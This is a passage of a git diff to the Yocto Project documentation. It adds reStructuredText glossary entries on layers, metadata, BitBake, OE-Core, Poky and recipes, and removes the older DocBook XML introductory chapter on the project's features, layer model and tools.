+   isolate information used when building for multiple architectures.
+   Layers are hierarchical in their ability to override previous
+   specifications. You can include any number of available layers from
+   the Yocto Project and customize the build by adding your layers after
+   them. You can search the Layer Index for layers used within Yocto
+   Project.
+
+   For more detailed information on layers, see the 
+   ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+   section in the Yocto Project Development Tasks Manual. For a
+   discussion specifically on BSP Layers, see the 
+   ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto
+   Project Board Support Packages (BSP) Developer's Guide.
+
+-  *Metadata:* A key element of the Yocto Project is the Metadata that
+   is used to construct a Linux distribution and is contained in the
+   files that the OpenEmbedded build system parses when building an
+   image. In general, Metadata includes recipes, configuration files,
+   and other information that refers to the build instructions
+   themselves, as well as the data used to control what things get built
+   and the effects of the build. Metadata also includes commands and
+   data used to indicate what versions of software are used, from where
+   they are obtained, and changes or additions to the software itself
+   (patches or auxiliary files) that are used to fix bugs or customize
+   the software for use in a particular situation. OpenEmbedded-Core is
+   an important set of validated metadata.
+
+-  *OpenEmbedded Build System:* The terms "BitBake" and "build system"
+   are sometimes used for the OpenEmbedded Build System.
+
+   BitBake is a task scheduler and execution engine that parses
+   instructions (i.e. recipes) and configuration data. After a parsing
+   phase, BitBake creates a dependency tree to order the compilation,
+   schedules the compilation of the included code, and finally executes
+   the building of the specified custom Linux image (distribution).
+   BitBake is similar to the ``make`` tool.
+
+   During a build process, the build system tracks dependencies and
+   performs a native or cross-compilation of the package. As a first
+   step in a cross-build setup, the framework attempts to create a
+   cross-compiler toolchain (i.e. Extensible SDK) suited for the target
+   platform.
+
+-  *OpenEmbedded-Core (OE-Core):* OE-Core is metadata comprised of
+   foundation recipes, classes, and associated files that are meant to
+   be common among many different OpenEmbedded-derived systems,
+   including the Yocto Project. OE-Core is a curated subset of an
+   original repository developed by the OpenEmbedded community that has
+   been pared down into a smaller, core set of continuously validated
+   recipes. The result is a tightly controlled and quality-assured core
+   set of recipes.
+
+   You can see the Metadata in the ``meta`` directory of the Yocto
+   Project `Source
+   Repositories <http://git.yoctoproject.org/cgit/cgit.cgi>`__.
+
+-  *Packages:* In the context of the Yocto Project, this term refers to
+   a recipe's packaged output produced by BitBake (i.e. a "baked
+   recipe"). A package is generally the compiled binaries produced from
+   the recipe's sources. You "bake" something by running it through
+   BitBake.
+
+   It is worth noting that the term "package" can, in general, have
+   subtle meanings. For example, the packages referred to in the
+   ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+   section in the Yocto Project Reference Manual are compiled binaries
+   that, when installed, add functionality to your Linux distribution.
+
+   Another point worth noting is that historically within the Yocto
+   Project, recipes were referred to as packages - thus, the existence
+   of several BitBake variables that are seemingly mis-named, (e.g.
+   :term:`PR`,
+   :term:`PV`, and
+   :term:`PE`).
+
+-  *Poky:* Poky is a reference embedded distribution and a reference
+   test configuration. Poky provides the following:
+
+   -  A base-level functional distro used to illustrate how to customize
+      a distribution.
+
+   -  A means by which to test the Yocto Project components (i.e. Poky
+      is used to validate the Yocto Project).
+
+   -  A vehicle through which you can download the Yocto Project.
+
+   Poky is not a product level distro. Rather, it is a good starting
+   point for customization.
+
+   .. note::
+
+      Poky is an integration layer on top of OE-Core.
+
+-  *Recipe:* The most common form of metadata. A recipe contains a list
+   of settings and tasks (i.e. instructions) for building packages that
+   are then used to build the binary image. A recipe describes where you
+   get source code and which patches to apply. Recipes describe
+   dependencies for libraries or for other recipes as well as
+   configuration and compilation options. Related recipes are
+   consolidated into a layer.
diff --git a/documentation/overview-manual/overview-manual-yp-intro.xml b/documentation/overview-manual/overview-manual-yp-intro.xml
deleted file mode 100644
index 1b60a30302..0000000000
--- a/documentation/overview-manual/overview-manual-yp-intro.xml
+++ /dev/null
@@ -1,1332 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-yp'>
-    <title>Introducing the Yocto Project</title>
-
-    <section id='what-is-the-yocto-project'>
-        <title>What is the Yocto Project?</title>
-
-        <para>
-            The Yocto Project is an open source collaboration project
-            that helps developers create custom Linux-based systems that are
-            designed for embedded products regardless of the product's hardware
-            architecture.
-            Yocto Project provides a flexible toolset and a development
-            environment that allows embedded device developers across the
-            world to collaborate through shared technologies, software stacks,
-            configurations, and best practices used to create these tailored
-            Linux images.
-        </para>
-
-        <para>
-            Thousands of developers worldwide have discovered that Yocto
-            Project provides advantages in both systems and applications
-            development, archival and management benefits, and customizations
-            used for speed, footprint, and memory utilization.
-            The project is a standard when it comes to delivering embedded
-            software stacks.
-            The project allows software customizations and build interchange
-            for multiple hardware platforms as well as software stacks that
-            can be maintained and scaled.
-        </para>
-
-        <para id='yp-key-dev-elements'>
-                <imagedata fileref="figures/key-dev-elements.png" format="PNG" align='center' width="8in"/>
-        </para>
-
-        <para>
-            For further introductory information on the Yocto Project, you
-            might be interested in this
-            <ulink url='https://www.embedded.com/electronics-blogs/say-what-/4458600/Why-the-Yocto-Project-for-my-IoT-Project-'>article</ulink>
-            by Drew Moseley and in this short introductory
-            <ulink url='https://www.youtube.com/watch?v=utZpKM7i5Z4'>video</ulink>.
-        </para>
-
-        <para>
-            The remainder of this section overviews advantages and challenges
-            tied to the Yocto Project.
-        </para>
-
-        <section id='gs-features'>
-            <title>Features</title>
-
-            <para>
-                The following list describes features and advantages of the
-                Yocto Project:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Widely Adopted Across the Industry:</emphasis>
-                        Semiconductor, operating system, software, and
-                        service vendors exist whose products and services
-                        adopt and support the Yocto Project.
-                        For a look at the Yocto Project community and
-                        the companies involved with the Yocto
-                        Project, see the "COMMUNITY" and "ECOSYSTEM" tabs
-                        on the
-                        <ulink url='&YOCTO_HOME_URL;'>Yocto Project</ulink>
-                        home page.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Architecture Agnostic:</emphasis>
-                        Yocto Project supports Intel, ARM, MIPS, AMD, PPC
-                        and other architectures.
-                        Most ODMs, OSVs, and chip vendors create and supply
-                        BSPs that support their hardware.
-                        If you have custom silicon, you can create a BSP
-                        that supports that architecture.</para>
-
-                        <para>Aside from lots of architecture support, the
-                        Yocto Project fully supports a wide range of device
-                        emulation through the Quick EMUlator (QEMU).
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Images and Code Transfer Easily:</emphasis>
-                        Yocto Project output can easily move between
-                        architectures without moving to new development
-                        environments.
-                        Additionally, if you have used the Yocto Project to
-                        create an image or application and you find yourself
-                        not able to support it, commercial Linux vendors such
-                        as Wind River, Mentor Graphics, Timesys, and ENEA could
-                        take it and provide ongoing support.
-                        These vendors have offerings that are built using
-                        the Yocto Project.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Flexibility:</emphasis>
-                        Corporations use the Yocto Project many different ways.
-                        One example is to create an internal Linux distribution
-                        as a code base the corporation can use across multiple
-                        product groups.
-                        Through customization and layering, a project group
-                        can leverage the base Linux distribution to create
-                        a distribution that works for their product needs.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Ideal for Constrained Embedded and IoT devices:</emphasis>
-                        Unlike a full Linux distribution, you can use the
-                        Yocto Project to create exactly what you need for
-                        embedded devices.
-                        You only add the feature support or packages that you
-                        absolutely need for the device.
-                        For devices that have display hardware, you can use
-                        available system components such as X11, GTK+, Qt,
-                        Clutter, and SDL (among others) to create a rich user
-                        experience.
-                        For devices that do not have a display or where you
-                        want to use alternative UI frameworks, you can choose
-                        to not install these components.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Comprehensive Toolchain Capabilities:</emphasis>
-                        Toolchains for supported architectures satisfy most
-                        use cases.
-                        However, if your hardware supports features that are
-                        not part of a standard toolchain, you can easily
-                        customize that toolchain through specification of
-                        platform-specific tuning parameters.
-                        And, should you need to use a third-party toolchain,
-                        mechanisms built into the Yocto Project allow for that.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Mechanism Rules Over Policy:</emphasis>
-                        Focusing on mechanism rather than policy ensures that
-                        you are free to set policies based on the needs of your
-                        design instead of adopting decisions enforced by some
-                        system software provider.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Uses a Layer Model:</emphasis>
-                        The Yocto Project
-                        <link linkend='the-yocto-project-layer-model'>layer infrastructure</link>
-                        groups related functionality into separate bundles.
-                        You can incrementally add these grouped functionalities
-                        to your project as needed.
-                        Using layers to isolate and group functionality
-                        reduces project complexity and redundancy, allows you
-                        to easily extend the system, make customizations,
-                        and keep functionality organized.
-                        </para></listitem>
-                     <listitem><para>
-                        <emphasis>Supports Partial Builds:</emphasis>
-                        You can build and rebuild individual packages as
-                        needed.
-                        Yocto Project accomplishes this through its
-                        <link linkend='shared-state-cache'>shared-state cache</link>
-                        (sstate) scheme.
-                        Being able to build and debug components individually
-                        eases project development.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Releases According to a Strict Schedule:</emphasis>
-                        Major releases occur on a
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-release-process'>six-month cycle</ulink>
-                        predictably in October and April.
-                        The most recent two releases support point releases
-                        to address common vulnerabilities and exposures.
-                        This predictability is crucial for projects based on
-                        the Yocto Project and allows development teams to
-                        plan activities.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Rich Ecosystem of Individuals and Organizations:</emphasis>
-                        For open source projects, the value of community is
-                        very important.
-                        Support forums, expertise, and active developers who
-                        continue to push the Yocto Project forward are readily
-                        available.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Binary Reproducibility:</emphasis>
-                        The Yocto Project allows you to be very specific about
-                        dependencies and achieves very high percentages of
-                        binary reproducibility (e.g. 99.8% for
-                        <filename>core-image-minimal</filename>).
-                        When distributions are not specific about which
-                        packages are pulled in and in what order to support
-                        dependencies, other build systems can arbitrarily
-                        include packages.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>License Manifest:</emphasis>
-                        The Yocto Project provides a
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>license manifest</ulink>
-                        for review by people who need to track the use of open
-                        source licenses (e.g.legal teams).
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='gs-challenges'>
-            <title>Challenges</title>
-
-            <para>
-                The following list presents challenges you might encounter
-                when developing using the Yocto Project:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Steep Learning Curve:</emphasis>
-                        The Yocto Project has a steep learning curve and has
-                        many different ways to accomplish similar tasks.
-                        It can be difficult to choose how to proceed when
-                        varying methods exist by which to accomplish a given
-                        task.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Understanding What Changes You Need to Make
-                        For Your Design Requires Some Research:</emphasis>
-                        Beyond the simple tutorial stage, understanding what
-                        changes need to be made for your particular design
-                        can require a significant amount of research and
-                        investigation.
-                        For information that helps you transition from
-                        trying out the Yocto Project to using it for your
-                        project, see the
-                        "<ulink url='&YOCTO_DOCS_URL;/what-i-wish-id-known/'>What I wish I'd Known</ulink>"
-                        and
-                        "<ulink url='&YOCTO_DOCS_URL;/transitioning-to-a-custom-environment/'>Transitioning to a Custom Environment for Systems Development</ulink>"
-                        documents on the Yocto Project website.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Project Workflow Could Be Confusing:</emphasis>
-                        The
-                        <link linkend='overview-development-environment'>Yocto Project workflow</link>
-                        could be confusing if you are used to traditional
-                        desktop and server software development.
-                        In a desktop development environment, mechanisms exist
-                        to easily pull and install new packages, which are
-                        typically pre-compiled binaries from servers accessible
-                        over the Internet.
-                        Using the Yocto Project, you must modify your
-                        configuration and rebuild to add additional packages.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Working in a Cross-Build Environment Can
-                        Feel Unfamiliar:</emphasis>
-                        When developing code to run on a target, compilation,
-                        execution, and testing done on the actual target
-                        can be faster than running a BitBake build on a
-                        development host and then deploying binaries to the
-                        target for test.
-                        While the Yocto Project does support development tools
-                        on the target, the additional step of integrating your
-                        changes back into the Yocto Project build environment
-                        would be required.
-                        Yocto Project supports an intermediate approach that
-                        involves making changes on the development system
-                        within the BitBake environment and then deploying only
-                        the updated packages to the target.</para>
-
-                        <para>The Yocto Project
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-                        produces packages in standard formats (i.e. RPM,
-                        DEB, IPK, and TAR).
-                        You can deploy these packages into the running system
-                        on the target by using utilities on the target such
-                        as <filename>rpm</filename> or
-                        <filename>ipk</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Initial Build Times Can be Significant:</emphasis>
-                        Long initial build times are unfortunately unavoidable
-                        due to the large number of packages initially built
-                        from scratch for a fully functioning Linux system.
-                        Once that initial build is completed, however, the
-                        shared-state (sstate) cache mechanism Yocto Project
-                        uses keeps the system from rebuilding packages that
-                        have not been "touched" since the last build.
-                        The sstate mechanism significantly reduces times
-                        for successive builds.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='the-yocto-project-layer-model'>
-        <title>The Yocto Project Layer Model</title>
-
-        <para>
-            The Yocto Project's "Layer Model" is a development model for
-            embedded and IoT Linux creation that distinguishes the
-            Yocto Project from other simple build systems.
-            The Layer Model simultaneously supports collaboration and
-            customization.
-            Layers are repositories that contain related sets of instructions
-            that tell the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-            what to do.
-            You can collaborate, share, and reuse layers.
-        </para>
-
-        <para>
-            Layers can contain changes to previous instructions or settings
-            at any time.
-            This powerful override capability is what allows you to customize
-            previously supplied collaborative or community layers to suit your
-            product requirements.
-        </para>
-
-        <para>
-            You use different layers to logically separate information in your
-            build.
-            As an example, you could have BSP, GUI, distro configuration,
-            middleware, or application layers.
-            Putting your entire build into one layer limits and complicates
-            future customization and reuse.
-            Isolating information into layers, on the other hand, helps
-            simplify future customizations and reuse.
-            You might find it tempting to keep everything in one layer when
-            working on a single project.
-            However, the more modular your Metadata, the easier
-            it is to cope with future changes.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        Use Board Support Package (BSP) layers from silicon
-                        vendors when possible.
-                        </para></listitem>
-                    <listitem><para>
-                        Familiarize yourself with the
-                        <ulink url='https://caffelli-staging.yoctoproject.org/software-overview/layers/'>Yocto Project curated layer index</ulink>
-                        or the
-                        <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded layer index</ulink>.
-                        The latter contains more layers but they are less
-                        universally validated.
-                        </para></listitem>
-                    <listitem><para>
-                        Layers support the inclusion of technologies, hardware
-                        components, and software components.
-                        The
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#making-sure-your-layer-is-compatible-with-yocto-project'>Yocto Project Compatible</ulink>
-                        designation provides a minimum level of standardization
-                        that contributes to a strong ecosystem.
-                        "YP Compatible" is applied to appropriate products and
-                        software components such as BSPs, other OE-compatible
-                        layers, and related open-source projects, allowing the
-                        producer to use Yocto Project badges and branding
-                        assets.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            To illustrate how layers are used to keep things modular, consider
-            machine customizations.
-            These types of customizations typically reside in a special layer,
-            rather than a general layer, called a BSP Layer.
-            Furthermore, the machine customizations should be isolated from
-            recipes and Metadata that support a new GUI environment,
-            for example.
-            This situation gives you a couple of layers: one for the machine
-            configurations, and one for the GUI environment.
-            It is important to understand, however, that the BSP layer can
-            still make machine-specific additions to recipes within the GUI
-            environment layer without polluting the GUI layer itself
-            with those machine-specific changes.
-            You can accomplish this through a recipe that is a BitBake append
-            (<filename>.bbappend</filename>) file, which is described later
-            in this section.
-            <note>
-                For general information on BSP layer structure, see the
-                <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Packages (BSP) Developer's Guide</ulink>.
-            </note>
-        </para>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            contains both general layers and BSP layers right out of the box.
-            You can easily identify layers that ship with a Yocto Project
-            release in the Source Directory by their names.
-            Layers typically have names that begin with the string
-            <filename>meta-</filename>.
-            <note>
-                It is not a requirement that a layer name begin with the
-                prefix <filename>meta-</filename>, but it is a commonly
-                accepted standard in the Yocto Project community.
-            </note>
-            For example, if you were to examine the
-            <ulink url='https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/'>tree view</ulink>
-            of the <filename>poky</filename> repository, you will see several
-            layers: <filename>meta</filename>,
-            <filename>meta-skeleton</filename>,
-            <filename>meta-selftest</filename>,
-            <filename>meta-poky</filename>, and
-            <filename>meta-yocto-bsp</filename>.
-            Each of these repositories represents a distinct layer.
-        </para>
-
-        <para>
-            For procedures on how to create layers, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='components-and-tools'>
-        <title>Components and Tools</title>
-
-        <para>
-            The Yocto Project employs a collection of components and
-            tools used by the project itself, by project developers,
-            and by those using the Yocto Project.
-            These components and tools are open source projects and
-            metadata that are separate from the reference distribution
-            (<ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>)
-            and the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-            Most of the components and tools are downloaded separately.
-        </para>
-
-        <para>
-            This section provides brief overviews of the components and
-            tools associated with the Yocto Project.
-        </para>
-
-        <section id='gs-development-tools'>
-            <title>Development Tools</title>
-
-            <para>
-                The following list consists of tools that help you develop
-                images and applications using the Yocto Project:
-                <itemizedlist>
-                    <listitem><para id='gs-crops-overview'>
-                        <emphasis>CROPS:</emphasis>
-                        <ulink url='https://github.com/crops/poky-container/'>CROPS</ulink>
-                        is an open source, cross-platform development framework
-                        that leverages
-                        <ulink url='https://www.docker.com/'>Docker Containers</ulink>.
-                        CROPS provides an easily managed, extensible environment
-                        that allows you to build binaries for a variety of
-                        architectures on Windows, Linux and Mac OS X hosts.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>devtool</filename>:</emphasis>
-                        This command-line tool is available as part of the
-                        extensible SDK (eSDK) and is its cornerstone.
-                        You can use <filename>devtool</filename> to help build,
-                        test, and package software within the eSDK.
-                        You can use the tool to optionally integrate what you
-                        build into an image built by the OpenEmbedded build
-                        system.</para>
-
-                        <para>The <filename>devtool</filename> command employs
-                        a number of sub-commands that allow you to add, modify,
-                        and upgrade recipes.
-                        As with the OpenEmbedded build system, “recipes�
-                        represent software packages within
-                        <filename>devtool</filename>.
-                        When you use <filename>devtool add</filename>, a recipe
-                        is automatically created.
-                        When you use <filename>devtool modify</filename>, the
-                        specified existing recipe is used in order to determine
-                        where to get the source code and how to patch it.
-                        In both cases, an environment is set up so that when
-                        you build the recipe a source tree that is under your
-                        control is used in order to allow you to make changes
-                        to the source as desired.
-                        By default, both new recipes and the source go into
-                        a “workspace� directory under the eSDK.
-                        The <filename>devtool upgrade</filename> command
-                        updates an existing recipe so that you can build it
-                        for an updated set of source files.</para>
-
-                        <para>You can read about the
-                        <filename>devtool</filename> workflow in the Yocto
-                        Project Application Development and Extensible
-                        Software Development Kit (eSDK) Manual in the
-                        "<ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'>Using <filename>devtool</filename> in Your SDK Workflow'</ulink>"
-                        section.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
-                        The eSDK provides a cross-development toolchain and
-                        libraries tailored to the contents of a specific image.
-                        The eSDK makes it easy to add new applications and
-                        libraries to an image, modify the source for an
-                        existing component, test changes on the target
-                        hardware, and integrate into the rest of the
-                        OpenEmbedded build system.
-                        The eSDK gives you a toolchain experience supplemented
-                        with the powerful set of <filename>devtool</filename>
-                        commands tailored for the Yocto Project environment.
-                        </para>
-
-                        <para>For information on the eSDK, see the
-                        <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                        Manual.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Toaster:</emphasis>
-                        Toaster is a web interface to the Yocto Project
-                        OpenEmbedded build system.
-                        Toaster allows you to configure, run, and view
-                        information about builds.
-                        For information on Toaster, see the
-                        <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='gs-production-tools'>
-            <title>Production Tools</title>
-
-            <para>
-                The following list consists of tools that help production
-                related activities using the Yocto Project:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Auto Upgrade Helper:</emphasis>
-                        This utility when used in conjunction with the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-                        (BitBake and OE-Core) automatically generates upgrades
-                        for recipes that are based on new versions of the
-                        recipes published upstream.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Recipe Reporting System:</emphasis>
-                        The Recipe Reporting System tracks recipe versions
-                        available for Yocto Project.
-                        The main purpose of the system is to help you
-                        manage the recipes you maintain and to offer a dynamic
-                        overview of the project.
-                        The Recipe Reporting System is built on top of the
-                        <ulink url="http://layers.openembedded.org/layerindex/layers/">OpenEmbedded Layer Index</ulink>,
-                        which is a website that indexes OpenEmbedded-Core
-                        layers.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Patchwork:</emphasis>
-                        <ulink url='http://jk.ozlabs.org/projects/patchwork/'>Patchwork</ulink>
-                        is a fork of a project originally started by
-                        <ulink url='http://ozlabs.org/'>OzLabs</ulink>.
-                        The project is a web-based tracking system designed
-                        to streamline the process of bringing contributions
-                        into a project.
-                        The Yocto Project uses Patchwork as an organizational
-                        tool to handle patches, which number in the thousands
-                        for every release.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>AutoBuilder:</emphasis>
-                        AutoBuilder is a project that automates build tests
-                        and quality assurance (QA).
-                        By using the public AutoBuilder, anyone can determine
-                        the status of the current "master" branch of Poky.
-                        <note>
-                            AutoBuilder is based on
-                            <ulink url='https://buildbot.net/'>buildbot</ulink>.
-                        </note></para>
-
-                        <para>A goal of the Yocto Project is to lead the
-                        open source industry with a project that automates
-                        testing and QA procedures.
-                        In doing so, the project encourages a development
-                        community that publishes QA and test plans, publicly
-                        demonstrates QA and test plans, and encourages
-                        development of tools that automate and test and QA
-                        procedures for the benefit of the development
-                        community.</para>
-
-                        <para>You can learn more about the AutoBuilder used
-                        by the Yocto Project
-                        <ulink url='&YOCTO_AB_URL;'>here</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Cross-Prelink:</emphasis>
-                        Prelinking is the process of pre-computing the load
-                        addresses and link tables generated by the dynamic
-                        linker as compared to doing this at runtime.
-                        Doing this ahead of time results in performance
-                        improvements when the application is launched and
-                        reduced memory usage for libraries shared by many
-                        applications.</para>
-
-                        <para>Historically, cross-prelink is a variant of
-                        prelink, which was conceived by
-                        <ulink url='http://people.redhat.com/jakub/prelink.pdf'>Jakub Jel&iacute;nek</ulink>
-                        a number of years ago.
-                        Both prelink and cross-prelink are maintained in the
-                        same repository albeit on separate branches.
-                        By providing an emulated runtime dynamic linker
-                        (i.e. <filename>glibc</filename>-derived
-                        <filename>ld.so</filename> emulation), the
-                        cross-prelink project extends the prelink software’s
-                        ability to prelink a sysroot environment.
-                        Additionally, the cross-prelink software enables the
-                        ability to work in sysroot style environments.</para>
-
-                        <para>The dynamic linker determines standard load
-                        address calculations based on a variety of factors
-                        such as mapping addresses, library usage, and library
-                        function conflicts.
-                        The prelink tool uses this information, from the
-                        dynamic linker, to determine unique load addresses
-                        for executable and linkable format (ELF) binaries
-                        that are shared libraries and dynamically linked.
-                        The prelink tool modifies these ELF binaries with the
-                        pre-computed information.
-                        The result is faster loading and often lower memory
-                        consumption because more of the library code can
-                        be re-used from shared Copy-On-Write (COW) pages.
-                        </para>
-
-                        <para>The original upstream prelink project only
-                        supports running prelink on the end target device
-                        due to the reliance on the target device’s dynamic
-                        linker.
-                        This restriction causes issues when developing a
-                        cross-compiled system.
-                        The cross-prelink adds a synthesized dynamic loader
-                        that runs on the host, thus permitting cross-prelinking
-                        without ever having to run on a read-write target
-                        filesystem.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Pseudo:</emphasis>
-                        Pseudo is the Yocto Project implementation of
-                        <ulink url='http://man.he.net/man1/fakeroot'>fakeroot</ulink>,
-                        which is used to run commands in an environment
-                        that seemingly has root privileges.</para>
-
-                        <para>During a build, it can be necessary to perform
-                        operations that require system administrator
-                        privileges.
-                        For example, file ownership or permissions might need
-                        definition.
-                        Pseudo is a tool that you can either use directly or
-                        through the environment variable
-                        <filename>LD_PRELOAD</filename>.
-                        Either method allows these operations to succeed as
-                        if system administrator privileges exist even
-                        when they do not.</para>
-
-                        <para>You can read more about Pseudo in the
-                        "<link linkend='fakeroot-and-pseudo'>Fakeroot and Pseudo</link>"
-                        section.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='gs-openembedded-build-system'>
-            <title>Open-Embedded Build System Components</title>
-
-            <para>
-                The following list consists of components associated with the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>BitBake:</emphasis>
-                        BitBake is a core component of the Yocto Project and is
-                        used by the OpenEmbedded build system to build images.
-                        While BitBake is key to the build system, BitBake
-                        is maintained separately from the Yocto Project.</para>
-
-                        <para>BitBake is a generic task execution engine that
-                        allows shell and Python tasks to be run efficiently
-                        and in parallel while working within complex inter-task
-                        dependency constraints.
-                        In short, BitBake is a build engine that works
-                        through recipes written in a specific format in order
-                        to perform sets of tasks.</para>
-
-                        <para>You can learn more about BitBake in the
-                        <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>OpenEmbedded-Core:</emphasis>
-                        OpenEmbedded-Core (OE-Core) is a common layer of
-                        metadata (i.e. recipes, classes, and associated files)
-                        used by OpenEmbedded-derived systems, which includes
-                        the Yocto Project.
-                        The Yocto Project and the OpenEmbedded Project both
-                        maintain the OpenEmbedded-Core.
-                        You can find the OE-Core metadata in the Yocto Project
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta'>Source Repositories</ulink>.
-                        </para>
-
-                        <para>Historically, the Yocto Project integrated the
-                        OE-Core metadata throughout the Yocto Project
-                        source repository reference system (Poky).
-                        After Yocto Project Version 1.0, the Yocto Project
-                        and OpenEmbedded agreed to work together and share a
-                        common core set of metadata (OE-Core), which contained
-                        much of the functionality previously found in Poky.
-                        This collaboration achieved a long-standing
-                        OpenEmbedded objective for having a more tightly
-                        controlled and quality-assured core.
-                        The results also fit well with the Yocto Project
-                        objective of achieving a smaller number of fully
-                        featured tools as compared to many different ones.
-                        </para>
-
-                        <para>Sharing a core set of metadata results in Poky
-                        as an integration layer on top of OE-Core.
-                        You can see that in this
-                        <link linkend='yp-key-dev-elements'>figure</link>.
-                        The Yocto Project combines various components such as
-                        BitBake, OE-Core, script “glue�, and documentation
-                        for its build system.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='gs-reference-distribution-poky'>
-            <title>Reference Distribution (Poky)</title>
-
-            <para>
-                Poky is the Yocto Project reference distribution.
-                It contains the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>Open-Embedded build system</ulink>
-                (BitBake and OE-Core) as well as a set of metadata to get you
-                started building your own distribution.
-                See the
-                <link linkend='what-is-the-yocto-project'>figure</link> in
-                "What is the Yocto Project?" section for an illustration
-                that shows Poky and its relationship with other parts of the
-                Yocto Project.</para>
-
-                <para>To use the Yocto Project tools and components, you
-                can download (<filename>clone</filename>) Poky and use it
-                to bootstrap your own distribution.
-                <note>
-                    Poky does not contain binary files.
-                    It is a working example of how to build your own custom
-                    Linux distribution from source.
-                </note>
-                You can read more about Poky in the
-                "<link linkend='reference-embedded-distribution'>Reference Embedded Distribution (Poky)</link>"
-                section.
-            </para>
-        </section>
-
-        <section id='gs-packages-for-finished-targets'>
-            <title>Packages for Finished Targets</title>
-
-            <para>
-                The following lists components associated with packages
-                for finished targets:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Matchbox:</emphasis>
-                        Matchbox is an Open Source, base environment for the
-                        X Window System running on non-desktop, embedded
-                        platforms such as handhelds, set-top boxes, kiosks,
-                        and anything else for which screen space, input
-                        mechanisms, or system resources are limited.</para>
-
-                        <para>Matchbox consists of a number of interchangeable
-                        and optional applications that you can tailor to a
-                        specific, non-desktop platform to enhance usability
-                        in constrained environments.</para>
-
-                        <para>You can find the Matchbox source in the Yocto
-                        Project
-                        <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Opkg</emphasis>
-                        Open PacKaGe management (opkg) is a lightweight
-                        package management system based on the itsy package
-                        (ipkg) management system.
-                        Opkg is written in C and resembles Advanced Package
-                        Tool (APT) and Debian Package (dpkg) in operation.
-                        </para>
-
-                        <para>Opkg is intended for use on embedded Linux
-                        devices and is used in this capacity in the
-                        <ulink url='http://www.openembedded.org/wiki/Main_Page'>OpenEmbedded</ulink>
-                        and
